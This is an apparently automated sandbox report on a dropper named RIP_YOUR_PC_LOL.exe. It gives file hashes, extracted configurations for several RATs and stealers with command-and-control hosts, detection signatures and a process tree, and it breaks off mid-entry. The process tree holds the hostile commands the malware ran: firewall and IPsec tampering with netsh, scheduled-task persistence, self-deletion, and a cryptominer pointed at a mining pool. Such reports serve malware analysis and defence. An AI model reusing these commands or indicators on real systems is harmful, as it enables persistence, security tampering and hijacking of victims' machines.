Resubmissions

06-10-2023 19:40

231006-ydmxjsfe5s 10

07-08-2023 11:23

230807-ng6tqafa49 10

07-08-2023 11:15

230807-ncqlyagb9z 10

06-08-2023 21:35

230806-1fltdadf7y 10

24-07-2023 06:23

230724-g5yppabb61 10

24-07-2023 06:22

230724-g41snaaf98 10

05-07-2023 08:43

230705-kmlh7abc54 10

Analysis

  • max time kernel
    409s
  • max time network
    414s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    02-06-2022 21:46

General

  • Target

    RIP_YOUR_PC_LOL.exe

  • Size

    22.5MB

  • MD5

    52867174362410d63215d78e708103ea

  • SHA1

    7ae4e1048e4463a4201bdeaf224c5b6face681bf

  • SHA256

    37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a

  • SHA512

    89e17e147d3f073e479e85d0b0321f6264bbc2aa84c930ed645e8f5cde3f1e58812c3db1ba0f10bee6ce7ac0731e1e3de6747a9b3c4d63a564dd8d904bd726ab

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    fcb-aws-host-4

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

gfhhjgh.duckdns.org:8050

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_file

    system32.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

nanocore

Version

1.2.2.0

C2

172.98.92.42:58491

127.0.0.1:58491

Mutex

c5a0b6d8-d1f7-45cd-943b-d5fda411e988

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    127.0.0.1

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2021-09-20T02:48:09.651743436Z

  • bypass_user_account_control

    false

  • bypass_user_account_control_data

    PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    58491

  • default_group

    Default

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    c5a0b6d8-d1f7-45cd-943b-d5fda411e988

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    172.98.92.42

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    false

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

njrat

Version

im523

Botnet

mediaget

C2

kazya1.hopto.org:1470

Mutex

a797c6ca3f5e7aff8fa1149c47fe9466

Attributes
  • reg_key

    a797c6ca3f5e7aff8fa1149c47fe9466

  • splitter

    |'|'|

Extracted

Family

fickerstealer

C2

80.87.192.115:80

Extracted

Family

redline

Botnet

@zhilsholi

C2

yabynennet.xyz:81

Attributes
  • auth_value

    c2d0b7a2ede97b91495c99e75b4f27fb

Extracted

Family

pony

C2

http://londonpaerl.co.uk/yesup/gate.php

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect PurpleFox Rootkit 7 IoCs

    Detect PurpleFox Rootkit.

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Gh0st RAT payload 12 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • UAC bypass 3 TTPs 9 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • Async RAT payload 5 IoCs
  • DCRat Payload 13 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • NirSoft MailPassView 6 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 5 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 9 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 46 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 14 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Modifies data under HKEY_USERS 12 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 10 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe
    "C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3196
    • C:\Users\Admin\AppData\Roaming\healastounding.exe
      "C:\Users\Admin\AppData\Roaming\healastounding.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4648
      • C:\Users\Admin\AppData\Roaming\test.exe
        "C:\Users\Admin\AppData\Roaming\test.exe"
        3⤵
        • Executes dropped EXE
        PID:4256
      • C:\Users\Admin\AppData\Roaming\gay.exe
        "C:\Users\Admin\AppData\Roaming\gay.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        PID:4876
        • C:\Users\Admin\AppData\Roaming\mediaget.exe
          "C:\Users\Admin\AppData\Roaming\mediaget.exe"
          4⤵
          • Executes dropped EXE
          • Drops startup file
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:1652
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
            5⤵
            • Modifies Windows Firewall
            PID:2236
      • C:\Users\Admin\AppData\Roaming\4.exe
        "C:\Users\Admin\AppData\Roaming\4.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        PID:1596
        • C:\Users\Admin\AppData\Roaming\3.exe
          "C:\Users\Admin\AppData\Roaming\3.exe"
          4⤵
          • UAC bypass
          • Executes dropped EXE
          • Checks computer location settings
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in System32 directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • System policy modification
          PID:2248
          • C:\Users\Admin\AppData\Roaming\3.exe
            "C:\Users\Admin\AppData\Roaming\3.exe"
            5⤵
            • UAC bypass
            • Executes dropped EXE
            • Checks computer location settings
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • System policy modification
            PID:3680
            • C:\Windows\System32\cryptuiwizard\RuntimeBroker.exe
              "C:\Windows\System32\cryptuiwizard\RuntimeBroker.exe"
              6⤵
              • UAC bypass
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of AdjustPrivilegeToken
              • System policy modification
              PID:2984
      • C:\Users\Admin\AppData\Roaming\a.exe
        "C:\Users\Admin\AppData\Roaming\a.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        PID:4852
      • C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
        "C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        PID:1472
        • C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
          "C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          PID:5044
          • C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
            "C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"
            5⤵
            • Executes dropped EXE
            PID:4372
        • C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
          "C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:5028
          • C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
            "C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"
            5⤵
            • Executes dropped EXE
            PID:4412
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1312
              6⤵
              • Program crash
              PID:4612
        • C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
          "C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
          4⤵
          • Executes dropped EXE
          PID:3476
      • C:\Users\Admin\AppData\Roaming\aaa.exe
        "C:\Users\Admin\AppData\Roaming\aaa.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        PID:1188
        • C:\Users\Admin\AppData\Roaming\aaa.exe
          "C:\Users\Admin\AppData\Roaming\aaa.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Accesses Microsoft Outlook accounts
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_win_path
          PID:1932
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\240599046.bat" "C:\Users\Admin\AppData\Roaming\aaa.exe" "
            5⤵
              PID:4360
        • C:\Users\Admin\AppData\Roaming\Opus.exe
          "C:\Users\Admin\AppData\Roaming\Opus.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4532
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /create /f /tn "TCP Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpB1A2.tmp"
            4⤵
            • Creates scheduled task(s)
            PID:3456
      • C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
        "C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        PID:4144
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
          3⤵
          • Accesses Microsoft Outlook accounts
          PID:1812
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
          3⤵
            PID:4948
        • C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
          "C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1776
          • C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
            "C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
            3⤵
            • Executes dropped EXE
            PID:4396
        • C:\Users\Admin\AppData\Roaming\22.exe
          "C:\Users\Admin\AppData\Roaming\22.exe"
          2⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4348
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Block
            3⤵
              PID:4552
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filterlist name=Filter1
              3⤵
                PID:2848
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                3⤵
                  PID:4176
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  3⤵
                    PID:4832
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    3⤵
                      PID:3888
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                      3⤵
                        PID:4260
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                        3⤵
                          PID:1916
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                          3⤵
                            PID:3140
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static add filteraction name=FilteraAtion1 action=block
                            3⤵
                              PID:3456
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
                              3⤵
                                PID:2536
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh ipsec static set policy name=Block assign=y
                                3⤵
                                  PID:1096
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"
                                  3⤵
                                    PID:1372
                                • C:\Users\Admin\AppData\Roaming\___11.19.exe
                                  "C:\Users\Admin\AppData\Roaming\___11.19.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of SetWindowsHookEx
                                  • Suspicious use of WriteProcessMemory
                                  PID:4156
                                  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                    C:\Users\Admin\AppData\Local\Temp\\svchost.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Drops file in System32 directory
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:3492
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul
                                      4⤵
                                        PID:3504
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping -n 2 127.0.0.1
                                          5⤵
                                          • Runs ping.exe
                                          PID:4984
                                    • C:\Users\Admin\AppData\Local\Temp\svchos.exe
                                      C:\Users\Admin\AppData\Local\Temp\\svchos.exe
                                      3⤵
                                      • Executes dropped EXE
                                      • Sets DLL path for service in the registry
                                      • Loads dropped DLL
                                      • Drops file in System32 directory
                                      PID:4792
                                    • C:\Users\Admin\AppData\Roaming\HD____11.19.exe
                                      C:\Users\Admin\AppData\Roaming\HD____11.19.exe
                                      3⤵
                                      • Executes dropped EXE
                                      PID:1832
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 652
                                        4⤵
                                        • Program crash
                                        PID:3820
                                • C:\Windows\SysWOW64\TXPlatforn.exe
                                  C:\Windows\SysWOW64\TXPlatforn.exe -auto
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:5064
                                  • C:\Windows\SysWOW64\TXPlatforn.exe
                                    C:\Windows\SysWOW64\TXPlatforn.exe -acsi
                                    2⤵
                                    • Drops file in Drivers directory
                                    • Executes dropped EXE
                                    • Sets service image path in registry
                                    • Suspicious behavior: LoadsDriver
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:60
                                • C:\Windows\SysWOW64\schtasks.exe
                                  "schtasks.exe" /create /f /tn "TCP Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp8C18.tmp"
                                  1⤵
                                  • Creates scheduled task(s)
                                  PID:116
                                • C:\Windows\SysWOW64\svchost.exe
                                  C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
                                  1⤵
                                  • Loads dropped DLL
                                  • Drops file in System32 directory
                                  PID:4420
                                  • C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
                                    C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\240555281.txt",MainThread
                                    2⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:3296
                                • C:\Windows\SysWOW64\svchost.exe
                                  C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"
                                  1⤵
                                    PID:408
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "Ö÷¶¯·ÀÓù·þÎñÄ£¿é" /sc ONLOGON /tr "'C:\Windows\SysWOW64\KBDSOREX\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Creates scheduled task(s)
                                    PID:1244
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AppxBlockMap\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Creates scheduled task(s)
                                    PID:3888
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "test" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\test.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Creates scheduled task(s)
                                    PID:3692
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\CertPKICmdlet\dwm.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Creates scheduled task(s)
                                    PID:3484
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1832 -ip 1832
                                    1⤵
                                      PID:1980
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "Pluto Panel" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\PushStep\Pluto Panel.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Creates scheduled task(s)
                                      PID:1540
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\WmiPrvSE.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Creates scheduled task(s)
                                      PID:732
                                    • C:\Windows\system32\taskmgr.exe
                                      "C:\Windows\system32\taskmgr.exe" /4
                                      1⤵
                                      • Checks SCSI registry key(s)
                                      • Checks processor information in registry
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:5112
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\cryptuiwizard\RuntimeBroker.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Creates scheduled task(s)
                                      PID:1132
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "SIHClient" /sc ONLOGON /tr "'C:\Documents and Settings\SIHClient.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Creates scheduled task(s)
                                      PID:4528
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks.exe /create /tn "3" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\ExitEnter\3.exe'" /rl HIGHEST /f
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Creates scheduled task(s)
                                      PID:1340
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4412 -ip 4412
                                      1⤵
                                        PID:4884
                                      • C:\Windows\Help\Winlogon.exe
                                        C:\Windows\Help\Winlogon.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        PID:464
                                        • C:\Windows\SysWOW64\svchost.exe
                                          C:\Windows\system32\svchost.exe
                                          2⤵
                                          • Drops file in Windows directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2124
                                          • C:\Windows\Cursors\WUDFhosts.exe
                                            C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x
                                            3⤵
                                            • Executes dropped EXE
                                            PID:1480
                                        • C:\Windows\SysWOW64\svchost.exe
                                          C:\Windows\system32\svchost.exe
                                          2⤵
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3520
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 448
                                          2⤵
                                          • Program crash
                                          PID:4740
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 464 -ip 464
                                        1⤵
                                          PID:4388
                                        • C:\Windows\System32\mousocoreworker.exe
                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                          1⤵
                                            PID:1096
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                            1⤵
                                            • Enumerates system info in registry
                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                            PID:4556
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9af274f50,0x7ff9af274f60,0x7ff9af274f70
                                              2⤵
                                                PID:5004
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
